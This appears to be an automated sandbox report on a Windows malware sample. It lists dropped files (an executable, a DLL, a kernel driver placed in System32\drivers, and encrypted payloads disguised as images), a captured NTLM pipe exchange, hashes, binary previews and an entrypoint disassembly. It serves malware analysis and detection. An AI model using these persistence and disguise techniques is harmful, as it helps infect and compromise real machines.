                                                                            Preview:.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........|..z....|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....

                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\drops[1].jpg

                                                                            Download File
                                                                            Process:C:\Users\user\Documents\0b1G0H.exe
                                                                            File Type:PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                                            Category:dropped
                                                                            Size (bytes):37274
                                                                            Entropy (8bit):7.991781062764932
                                                                            Encrypted:true
                                                                            SSDEEP:768:6uBASoT9gu8yCOpS/DCNuoaa7SOjrX+ACdA7EtGKDRklnvga371DNpnN7s:fGSfyxENa7ZCRtxylnvgAVNI
                                                                            MD5:6D4DEB9526F3973DE0F9DCE9392F8EA7
                                                                            SHA1:520128FB9BAB7064BEA992E4427B924073E58C0E
                                                                            SHA-256:B415D73DC6CBEEE59736ADD1AF397B6982BDB2B3A9E994797EE6AF5979E58FD1
                                                                            SHA-512:F07E0DAEEE5C54BC8DB462630F46A339D9ED0AF346BAB113B4EC7FD2BC463AFC04CBD0FDFC8D9F54528B7127AA7735575A255B85F2D0B3CCD518FC5DC39BA447
                                                                            Malicious:false
                                                                            Preview:.PNG........IHDR.............\r.f....pHYs............... .IDATx....n.....&E!J.%M.."..9....."...H..L.....LI:.)..K7..!.4Q...{..d.....[......Z{......<.y<9.o...w....]...q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q......3%.F.1p..rD%.;%rD.1p.....qz.....1n.....p.....qz.....1n...0.^.I..9......c.Z....$.Q..K=.OKp=...e%.(.R.....p-tzD..9.m...+.Un...S...5..F..D......R.ys.?W.....|]....Ke......G......U..1....#^..1|..!.O.OWr.H.w.P..p.V..H.wz..mo.U....?F......k7[2.."....+...&]#..d......<...V\{P..d...8=.9..Al....Wr......Pc`......X.g..\.|i7.....O.B.g.p...]..%.^..T.w....a.u..x..zZ........V.....$.Y.6.t....?*.g.~..@.93.g.....lPn..o...7.p.J.Cq....J....3.<]...X...w..o..\.u...Jv...3e.).9q..6(..s...^.k...#..[Vr.t.47J}..M......:.....I%.Q\cPN.n...R.z;3J..c....q.].~s.J..._.d.........y....ur{:v...A.I%....)..*..t{..(.g.o...;....>..7)~{P~_.....5t{X<.x....J....J.0..YY\b.-&.?...Y7.$.X_.e.......{..Jd.3w...l......q.M...&..*...~f...[./.......w..U.^.{q.`......GVV...5.;Z.`W.-uxV...

                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\FOM-50[1].jpg

                                                                            Download File
                                                                            Process:C:\Users\user\Documents\0b1G0H.exe
                                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
                                                                            Category:dropped
                                                                            Size (bytes):55085
                                                                            Entropy (8bit):7.99273647746538
                                                                            Encrypted:true
                                                                            SSDEEP:1536:puwkqL5y4p4KnRWlENc3PGdLLv/PJctIJPc+pifyC:kQM4+B/MLL/PmaG
                                                                            MD5:DC44AE348E6A74B3A74871020FDFAC74
                                                                            SHA1:B223020A5F82FF15FD5E4930477F38F34C9CB919
                                                                            SHA-256:48F258037BE0FFE663DA3BCD47DBA22094CC31940083D9E18A71882BDC1ECDB8
                                                                            SHA-512:5FB13A8CE2206119C76325504DEF61D4277A73D71D79157AE564F326D6FC18080218633CE7C708F31A81D6CD1A5AD8A903CFE1CC0C57183B4809A9C12E32A429
                                                                            Malicious:false
                                                                            Preview:......JFIF.............ZExif..MM.*.................J............Q...........Q..........%Q..........%...............C....................................................................C.......................................................................7.K.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEF..................ijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......".*.;...i6QE................HJJKLINOP..ST.VWXYZ[\.^_`abcdefghijklmnopqrstuvwxyz{|}~..a.....=..>.A

                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\drops[1].jpg

                                                                            Download File
                                                                            Process:C:\Users\user\Documents\0b1G0H.exe
                                                                            File Type:PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                                            Category:dropped
                                                                            Size (bytes):37274
                                                                            Entropy (8bit):7.991781062764932
                                                                            Encrypted:true
                                                                            SSDEEP:768:6uBASoT9gu8yCOpS/DCNuoaa7SOjrX+ACdA7EtGKDRklnvga371DNpnN7s:fGSfyxENa7ZCRtxylnvgAVNI
                                                                            MD5:6D4DEB9526F3973DE0F9DCE9392F8EA7
                                                                            SHA1:520128FB9BAB7064BEA992E4427B924073E58C0E
                                                                            SHA-256:B415D73DC6CBEEE59736ADD1AF397B6982BDB2B3A9E994797EE6AF5979E58FD1
                                                                            SHA-512:F07E0DAEEE5C54BC8DB462630F46A339D9ED0AF346BAB113B4EC7FD2BC463AFC04CBD0FDFC8D9F54528B7127AA7735575A255B85F2D0B3CCD518FC5DC39BA447
                                                                            Malicious:false
                                                                            Preview:.PNG........IHDR.............\r.f....pHYs............... .IDATx....n.....&E!J.%M.."..9....."...H..L.....LI:.)..K7..!.4Q...{..d.....[......Z{......<.y<9.o...w....]...q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q......3%.F.1p..rD%.;%rD.1p.....qz.....1n.....p.....qz.....1n...0.^.I..9......c.Z....$.Q..K=.OKp=...e%.(.R.....p-tzD..9.m...+.Un...S...5..F..D......R.ys.?W.....|]....Ke......G......U..1....#^..1|..!.O.OWr.H.w.P..p.V..H.wz..mo.U....?F......k7[2.."....+...&]#..d......<...V\{P..d...8=.9..Al....Wr......Pc`......X.g..\.|i7.....O.B.g.p...]..%.^..T.w....a.u..x..zZ........V.....$.Y.6.t....?*.g.~..@.93.g.....lPn..o...7.p.J.Cq....J....3.<]...X...w..o..\.u...Jv...3e.).9q..6(..s...^.k...#..[Vr.t.47J}..M......:.....I%.Q\cPN.n...R.z;3J..c....q.].~s.J..._.d.........y....ur{:v...A.I%....)..*..t{..(.g.o...;....>..7)~{P~_.....5t{X<.x....J....J.0..YY\b.-&.?...Y7.$.X_.e.......{..Jd.3w...l......q.M...&..*...~f...[./.......w..U.^.{q.`......GVV...5.;Z.`W.-uxV...

                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\FOM-51[1].jpg

                                                                            Download File
                                                                            Process:C:\Users\user\Documents\0b1G0H.exe
                                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
                                                                            Category:dropped
                                                                            Size (bytes):4859125
                                                                            Entropy (8bit):7.999956261017207
                                                                            Encrypted:true
                                                                            SSDEEP:98304:iwS8fBFQmSDP3eB/FsE7wRnIdq//xvpY/gMQ+nQxcweXxpuQ6SutPQNCG0o:iwSgTQfFAwdCqRvpk5QvxcwgXMSutTo
                                                                            MD5:EE6CA3EEA7F9B1C81059AEF570A28C02
                                                                            SHA1:14EFBF498356644D9B1327407E3F03E1BFBEA363
                                                                            SHA-256:A2065EA035C4E391C0FD897A932DCFF34D2CCD34579844C732F3577BC443B196
                                                                            SHA-512:563E7D7AB4A94505F1EFA5931F685A45D89CCB27A97593BF69C668AAA747C9511C8BE2AADA2E4DF3E9AB02559B564C699A8A9501B70420FAC3556758E29478D5
                                                                            Malicious:false
                                                                            Preview:......JFIF.............ZExif..MM.*.................J............Q...........Q..........%Q..........%...............C....................................................................C.......................................................................7.K.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEF..................ijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......".*.;...i6QE................HJJKLINOP..ST.VWXYZ[\.^_`abcdefghijklmnopqrstuvwxyz{|}~........=..>.A

                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\FOM-53[1].jpg

                                                                            Download File
                                                                            Process:C:\Users\user\Documents\0b1G0H.exe
                                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
                                                                            Category:dropped
                                                                            Size (bytes):366410
                                                                            Entropy (8bit):7.375315637594966
                                                                            Encrypted:false
                                                                            SSDEEP:6144:XC/wwzn9iJzBFsJmUSmfXVz7pB+iMuVrt5DY:9ws7FsJmUSmd7pBpMgR58
                                                                            MD5:DA1D5EB665D3AAD523BE59415E6449ED
                                                                            SHA1:40C310E82035381410B83E4F1DA0A4410FEB8FE6
                                                                            SHA-256:F919634AC7E0877663FFF06EA9E430B530073D6E79EEE543D02331F4DFF64375
                                                                            SHA-512:6F179A166126C97444920636B584FB0BA4E9596A659921A2BCAA80E7DE094A87402D3E2B6D8DA8797045D7E22C3D37E6CED2A8E137E0387A1320D631B139FD36
                                                                            Malicious:false
                                                                            Preview:......JFIF.............ZExif..MM.*.................J............Q...........Q..........%Q..........%...............C....................................................................C.......................................................................7.K.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEF..................ijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......".*.;...i6QE.................IZ....OQPSS.U.WX..[..&6.ab.)eLghibkinoouqrsuuvw2zy{}}~.............

                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\f[1].dat

                                                                            Download File
                                                                            Process:C:\Users\user\Documents\0b1G0H.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):879
                                                                            Entropy (8bit):4.5851931774575325
                                                                            Encrypted:false
                                                                            SSDEEP:6:JRSscjAQ7F3Y+ZcRC60rdimzYFAQT7LE/o2xjC:fSscjHRY+ZcRAdimzo/OY
                                                                            MD5:E54C4296F011EC91D935AA353C936E34
                                                                            SHA1:53A3313D40696E87C9B8CE2BE7E67BE49DD34C20
                                                                            SHA-256:81FF16AEDF9C5225CE8A03C0608CC3EA417795D98345699F2C240A0D67C6C33D
                                                                            SHA-512:5D1FBA60BE82A33341E5B9E7D3C1E7B0DCC9A41B4C1F97F2930141A808D62AF56D8697CB0D2FD4894A6080DF98A3E4EEF9D98A6003C292C588F547E1C6F84DE1
                                                                            Malicious:false
                                                                            Preview:.V.Wf4e111111111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW11111111111111111111.BTE5k1=I=======.NXI9g%&A&&&&&&&NRRV%lyyKK..:{ggJ..J"+$-WEBXv941HD_R!|1=P.{r?_GBl(2%%%%%%%%%%%%%%%%%%%%%%%%%%%%%MQQU&ozzHH..9xddI..I!('.TFA[u:72KG\Q".2>S.xq<\D@n*0'''''''''''''''''''''''''''''OSSW$mxxJJ..;zffK..K#*%,VDCYw850IE^S }0<Q.zs>^FAo+1&&&&&&&&&&&&&&&&&&&&&&&&&&&&&NRRV%lyyKK..:{ggJ..J"+$-WEBXv941HD_R!|1=P.{r?_GAo+1&&&&&&&&&&&&&&&&&&&&&&&&&&&&&....&&&&....&&&&....&&&9\A\999999999999999999999M[ZV$3e.-goooooooooooooooooooooooooooooooooooooo...A23"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA45(-^.[N6><!K!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

                                                                            C:\Users\user\Documents\0b1G0H.exe

                                                                            Download File
                                                                            Process:C:\Users\user\Desktop\138745635-72645747.116.exe
                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):133136
                                                                            Entropy (8bit):6.350273548571922
                                                                            Encrypted:false
                                                                            SSDEEP:3072:NtmH5WKiSogv0HSCcTwk7ZaxbXq+d1ftrt+armpQowbFqD:NYZEHG0yfTPFas+dZZrL9MD
                                                                            MD5:D3709B25AFD8AC9B63CBD4E1E1D962B9
                                                                            SHA1:6281A108C7077B198241159C632749EEC5E0ECA8
                                                                            SHA-256:D2537DC4944653EFCD48DE73961034CFD64FB7C8E1BA631A88BBA62CCCC11948
                                                                            SHA-512:625F46D37BCA0F2505F46D64E7706C27D6448B213FE8D675AD6DF1D994A87E9CEECD7FB0DEFF35FDDD87805074E3920444700F70B943FAB819770D66D9E6B7AB
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s.E.7w+.7w+.7w+...V.?w+...E..w+...F.Qw+...P.5w+.>...>w+.7w*..w+...Y.>w+...W.6w+...S.6w+.Rich7w+.........PE..d...Kd.]..........#......*..........P].........@............................................................................................,...x...............,........H...........D...............................................@..@............................text...*).......*.................. ..`.rdata..x_...@...`..................@..@.data....:..........................@....pdata..,...........................@..@.rsrc...............................@..@................................................................................................................................................................................................................................................................................................................

                                                                            C:\Users\user\Documents\MsMpList.dat

                                                                            Download File
                                                                            Process:C:\Users\user\Desktop\138745635-72645747.116.exe
                                                                            File Type:PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                                            Category:dropped
                                                                            Size (bytes):3889557
                                                                            Entropy (8bit):7.999938751969579
                                                                            Encrypted:true
                                                                            SSDEEP:98304:WAnkiLOZS/hpXbdHpPcG59BO8NQXIeXXv5L4f2fN3yQWF+A:1ndLOZS/DtpPJRO8OHBL4f2UQI+A
                                                                            MD5:3C0243ADA13C967A672AA2516CDB2D51
                                                                            SHA1:4A11DF47059D86A6472E750BAA5BA2938E19DFB4
                                                                            SHA-256:F5B0057E37365AA6AEB4AD12AC82EF7EB93737D7608F8F565578850351A7E879
                                                                            SHA-512:B7391EAE2DD6CFC5B4140FAF3DB93B45DFEB12A5FA240824526BBE89ADC2904717212022C1066D3341F3E02190AAB1B61F17FD5B00A7DA3247A92B681A5A3196
                                                                            Malicious:false
                                                                            Preview:.PNG........IHDR.............\r.f....pHYs............... .IDATx....n.....&E!J.%M.."..9....."...H..L.....LI:.)..K7..!.4Q...{..d.....[......Z{......<.y<9.o...w....]...q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q......3%.F.1p..rD%.;%rD.1p.....qz.....1n.....p.....qz.....1n...0.^.I..9......c.Z....$.Q..K=.OKp=...e%.(.R.....p-tzD..9.m...+.Un...S...5..F..D......R.ys.?W.....|]....Ke......G......U..1....#^..1|..!.O.OWr.H.w.P..p.V..H.wz..mo.U....?F......k7[2.."....+...&]#..d......<...V\{P..d...8=.9..Al....Wr......Pc`......X.g..\.|i7.....O.B.g.p...]..%.^..T.w....a.u..x..zZ........V.....$.Y.6.t....?*.g.~..@.93.g.....lPn..o...7.p.J.Cq....J....3.<]...X...w..o..\.u...Jv...3e.).9q..6(..s...^.k...#..[Vr.t.47J}..M......:.....I%.Q\cPN.n...R.z;3J..c....q.].~s.J..._.d.........y....ur{:v...A.I%....)..*..t{..(.g.o...;....>..7)~{P~_.....5t{X<.x....J....J.0..YY\b.-&.?...Y7.$.X_.e.......{..Jd.3w...l......q.M...&..*...~f...[./.......w..U.^.{q.`......GVV...5.;Z.`W.-uxV...

                                                                            C:\Users\user\Documents\WordpadFilter.db

                                                                            Download File
                                                                            Process:C:\Users\user\Desktop\138745635-72645747.116.exe
                                                                            File Type:GIF image data, version 89a, 10 x 10
                                                                            Category:dropped
                                                                            Size (bytes):8228
                                                                            Entropy (8bit):7.979055445829556
                                                                            Encrypted:false
                                                                            SSDEEP:192:iBue6hKvTlByz2GqpoPTgyXrByFCt4lXp9tyey2Q0l:iBuNhyTlBU2dp+1XrBuCgp9vU0l
                                                                            MD5:AE644A1E51B58ABAFE05F3200F3FDC5F
                                                                            SHA1:0E543ACAF7FC915A27448B4477860129EF6EC65C
                                                                            SHA-256:0B8C38A079403B754BA661D63405EDE275EFD1BB0F1633C07DAE39F6DC1335FD
                                                                            SHA-512:C3C2EB18844C52AD2903D742BA896D5768591349830492B4596BFD7A8A1A990667AA6C5D41BC851E13E49C40E04A0F560AF76C67A63F5BFC39C225519EB54951
                                                                            Malicious:false
                                                                            Preview:GIF89a.......,...........;.;G_fx5.#DV..g..}A/...l=.2......'o...!.....e.,t..o8.^...B^x..6I*X.DC.Oa..../_...n$_.y..+jb..r...Y4/Rv.....(;....$...g..........~.IN ...-<R7....eZ..q4.....~...}....~t<......|}....x.)U3.`U..s....W..WY..w+o-[..{..l..i`.:.......L'.>...$. .a.x.2#y_(9....d,....=n...%..*.c.........dq.nfLI....!1..2...`.,...~....)w.5E 1.V...0."...cu...p........^|@.-w..+...M.(.GK.y}.N.........}.....-..e.......X...GE.|.-._..*.M.....Mc........9/..fQ.Z.....W.....s...........k?C.q.u.-...Q..."..kt..A..128.......7#...~....1.`..:C.(.C.<y.(..<..'..+.!&.....r..I.....d...W.....-.'.Ec`Nv.8).....!....?.....\..N.3..D...U.....(..#sdY..D"...p.>.W.Q...}.. ..2.A('Q\_y...|..Az..JO.B.A..Q05.)..Q..zd..V..l......S.....dS.x....z^..z...).a.....4.G..........M.,..a..U...\....G...$...Q.7...@.x...x.s..R..0.-3...).x.D..f.I..n.....}..{.p.q.%,.lF.f.Up..UM..Y..1............R.....F.._....Y..u...e^.c...f.'..U.W1g..e#J...Z.W.....w.[...........R.?.m......"@.f..V..fxI

                                                                            C:\Users\user\Documents\vselog.dll

                                                                            Download File
                                                                            Process:C:\Users\user\Desktop\138745635-72645747.116.exe
                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):122880
                                                                            Entropy (8bit):6.002011636615724
                                                                            Encrypted:false
                                                                            SSDEEP:1536:Jd4E7qItA4nbQ0R3rh4Q8/0fp0uQ4S8S7YDLbnTPtrTzvesW7dj9dl4Cp52Ft:Jf7qG3Gyp0p4ZmGLbTPJT7y7aCp5gt
                                                                            MD5:910F671676976811CC4C3373A965ABEB
                                                                            SHA1:162BF40E342152194F76FCF82BA0706248031E94
                                                                            SHA-256:F7A11CEB35F79182674C2CA30981B5ACBC2E91AF539B432256F35C0DF7F8A986
                                                                            SHA-512:BC6F885CAD036B576785FC4C531DA077B68EBBF8DDD6E439FA77257E96D5F8F361A81559411405BA9E8EB3786222D8B33639994F933C12F5FEF744BFA3AD6778
                                                                            Malicious:true
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......d... .E .E .Ek..D%.Ek..D..Ek..D*.E0N.D).E0N.D..E0N.D..Ek..D#.E .EB.EhO.D!.EhO.D!.EhOHE!.E . E!.EhO.D!.ERich .E........PE..d....w.g.........." ...).....................................................0............`.........................................`...........(.......H.................... ..x... ...8...............................@............ ...............................text............................... ..`.rdata....... ......................@..@.data...0...........................@....pdata..............................@..@.rsrc...H...........................@..@.reloc..x.... ......................@..B........................................................................................................................................................................................................................................

                                                                            C:\Windows\System32\drivers\189atohci.sys

                                                                            Download File
                                                                            Process:C:\Users\user\Desktop\138745635-72645747.116.exe
                                                                            File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):28272
                                                                            Entropy (8bit):6.228897489406113
                                                                            Encrypted:false
                                                                            SSDEEP:384:s3YUY30d1Kgf4AtcTmwZ/22a97C5ohYh3IB96Oys2+l0skiM0HMFrba8no0ceD/5:sOUkgfdZ9pRyv+uPzCMHo3q4tDgh7
                                                                            MD5:2175AD15B84CC955B41537E53239FCA5
                                                                            SHA1:1E033A33C785173A3538716D963D8707EF48D30C
                                                                            SHA-256:484B8BC156BAC8C42F8EF6643895F53B5398BE2FD3BD0440295476AA05150E8F
                                                                            SHA-512:B335342EE6A1E37401D15FA0956813FD2FC4FA2ADA4B22C3B0B3DCCFBB0705B6C9B8C8052811DFC7F3C309B1407AE49589922F7F3DE3C82D72EA8B35F6CE6077
                                                                            Malicious:true
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ri...:...:...:...:...:...:...:...:...:...:...:...:...:...:...:...:...:Rich...:........................PE..d....S.V.........."......:..........l................................................_..........................................................(............`.......P..p.......D....A...............................................@...............................text....,.......................... ..h.rdata.......@.......2..............@..H.data........P.......:..............@....pdata.......`.......<..............@..HPAGE....l....p.......>.............. ..`INIT.................@.............. ....rsrc................J..............@..B.reloc...............N..............@..B........................................................................................................................................................................................

                                                                            C:\xxxx.ini

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\cmd.exe
                                                                            File Type:ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):2
                                                                            Entropy (8bit):1.0
                                                                            Encrypted:false
                                                                            SSDEEP:3:y:y
                                                                            MD5:81051BCC2CF1BEDF378224B0A93E2877
                                                                            SHA1:BA8AB5A0280B953AA97435FF8946CBCBB2755A27
                                                                            SHA-256:7EB70257593DA06F682A3DDDA54A9D260D4FC514F645237F5CA74B08F8DA61A6
                                                                            SHA-512:1B302A2F1E624A5FB5AD94DDC4E5F8BFD74D26FA37512D0E5FACE303D8C40EEE0D0FFA3649F5DA43F439914D128166CB6C4774A7CAA3B174D7535451EB697B5D
                                                                            Malicious:false
                                                                            Preview:..

                                                                            \Device\Mup\localhost\pipe\atsvc

                                                                            Download File
                                                                            Process:C:\Program Files (x86)\NEiV2V\NEiV2V.exe
                                                                            File Type:GLS_BINARY_LSB_FIRST
                                                                            Category:dropped
                                                                            Size (bytes):297
                                                                            Entropy (8bit):4.437905442054105
                                                                            Encrypted:false
                                                                            SSDEEP:3:ri9K0/ldl//lll1siQg4d1ywsiQI5kZt8jtl/zi8tkHsl8/lP92lU8IAuUWKznlC:ri9TDTwPYtyjtOsNaG4oiO0o4
                                                                            MD5:14E0343592938C5B21DE81CAAD80DFCB
                                                                            SHA1:2B24FA4034C2A6281DCDD05DD1666DE6E5126D5D
                                                                            SHA-256:AB939D31A4C64B0AA09DAC369FE0A04CC0743B05BD707343BA7A499A9469DCE9
                                                                            SHA-512:BC1A3DD0A7B4D7023B6A770D433128ACF9C7B1700D39D03392177C5D36F80B96F79B890625D610DD54BC6FC5CC53D5DFDA797A0398BF313D71A36A17F2BD483C
                                                                            Malicious:false
                                                                            Preview:..........9.....................IY..D@.$.621.......]..........+.H`........IY..D@.$.621......,..l..@E....................NTLMSSP.............0.......(.....aJ....user-PCWORKGROUP........t.X.................NTLMSSP.........X.......X.......X.......X.......X.......X...5....aJ.....Y.o..l..@.h_.W

                                                                            Static File Info

                                                                            General

                                                                            File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                            Entropy (8bit):0.11328614376284821
                                                                            TrID:
                                                                            • Win64 Executable GUI (202006/5) 92.65%
                                                                            • Win64 Executable (generic) (12005/4) 5.51%
                                                                            • Generic Win/DOS Executable (2004/3) 0.92%
                                                                            • DOS Executable Generic (2002/1) 0.92%
                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                            File name:138745635-72645747.116.exe
                                                                            File size:30'950'400 bytes
                                                                            MD5:6da3af3e9ab312f971a0bc0171919175
                                                                            SHA1:4248ea64734da5c581d0ee43c7a68914935dcd8a
                                                                            SHA256:120a1ba5cfeff177fac2d353afbf765eccbd144ab5d743d8a3d6e722bc937714
                                                                            SHA512:34f49a13702f777e204cbcf73bbe155e91ce623cfab85d31f53cf296c56eb3fe99bbb2b13387bec8406c5cb4c39cdae9d21a59b907ffaf55f56e619251fa914d
                                                                            SSDEEP:6144:LRHmffRwlikTedV7KpkbHnuR1rV04ynYKZEF:LlmX1rdV7ruTrmjc
                                                                            TLSH:2067DF4273A460F9E5268279CE625747B732BC220B7187CF16649A4BDF333E29D39721
                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........A..............t.......e.......w.......c.........N.....s.......d.......a.....Rich............PE..d...W..T..........#........

                                                                            File Icon

                                                                            Icon Hash:3b6120282c4c5a1f

                                                                            Static PE Info

                                                                            General

                                                                            Entrypoint:0x140007e48
                                                                            Entrypoint Section:.text
                                                                            Digitally signed:false
                                                                            Imagebase:0x140000000
                                                                            Subsystem:windows gui
                                                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                            DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                            Time Stamp:0x5418B657 [Tue Sep 16 22:14:47 2014 UTC]
                                                                            TLS Callbacks:
                                                                            CLR (.Net) Version:
                                                                            OS Version Major:5
                                                                            OS Version Minor:2
                                                                            File Version Major:5
                                                                            File Version Minor:2
                                                                            Subsystem Version Major:5
                                                                            Subsystem Version Minor:2
                                                                            Import Hash:ec56500d0c24b61ba0ff7d3cc4d67613

                                                                            Entrypoint Preview

                                                                            Instruction
                                                                            dec eax
                                                                            sub esp, 28h
                                                                            call 00007FE11881BA74h
                                                                            dec eax
                                                                            add esp, 28h
                                                                            jmp 00007FE118810E5Fh
                                                                            int3
                                                                            int3
                                                                            dec eax
                                                                            mov dword ptr [esp+08h], ecx
                                                                            dec eax
                                                                            sub esp, 00000088h
                                                                            dec eax
                                                                            lea ecx, dword ptr [0000EA01h]
                                                                            call dword ptr [000093EBh]
                                                                            dec esp
                                                                            mov ebx, dword ptr [0000EAECh]
                                                                            dec esp
                                                                            mov dword ptr [esp+58h], ebx
                                                                            inc ebp
                                                                            xor eax, eax
                                                                            dec eax
                                                                            lea edx, dword ptr [esp+60h]
                                                                            dec eax
                                                                            mov ecx, dword ptr [esp+58h]
                                                                            call 00007FE11881FF58h
                                                                            dec eax
                                                                            mov dword ptr [esp+50h], eax
                                                                            dec eax
                                                                            cmp dword ptr [esp+50h], 00000000h
                                                                            je 00007FE118817C43h
                                                                            dec eax
                                                                            mov dword ptr [esp+38h], 00000000h
                                                                            dec eax
                                                                            lea eax, dword ptr [esp+48h]
                                                                            dec eax
                                                                            mov dword ptr [esp+30h], eax
                                                                            dec eax
                                                                            lea eax, dword ptr [esp+40h]
                                                                            dec eax
                                                                            mov dword ptr [esp+28h], eax
                                                                            dec eax
                                                                            lea eax, dword ptr [0000E9ACh]
                                                                            dec eax
                                                                            mov dword ptr [esp+20h], eax
                                                                            dec esp
                                                                            mov ecx, dword ptr [esp+50h]
                                                                            dec esp
                                                                            mov eax, dword ptr [esp+58h]
                                                                            dec eax
                                                                            mov edx, dword ptr [esp+60h]
                                                                            xor ecx, ecx
                                                                            call 00007FE11881FF06h
                                                                            jmp 00007FE118817C24h
                                                                            dec eax
                                                                            mov eax, dword ptr [esp+00000088h]
                                                                            dec eax
                                                                            mov dword ptr [0000EA78h], eax
                                                                            dec eax
                                                                            lea eax, dword ptr [esp+00000088h]
                                                                            dec eax
                                                                            add eax, 08h
                                                                            dec eax
                                                                            mov dword ptr [0000EA05h], eax
                                                                            dec eax
                                                                            mov eax, dword ptr [0000EA5Eh]
                                                                            dec eax
                                                                            mov dword ptr [0000E8CFh], eax

                                                                            Rich Headers

                                                                            Programming Language:
                                                                            • [C++] VS2008 SP1 build 30729
                                                                            • [ASM] VS2008 SP1 build 30729
                                                                            • [IMP] VS2008 SP1 build 30729
                                                                            • [ C ] VS2008 SP1 build 30729
                                                                            • [RES] VS2008 build 21022
                                                                            • [LNK] VS2008 SP1 build 30729

                                                                            Data Directories

                                                                            NameVirtual AddressVirtual Size Is in Section
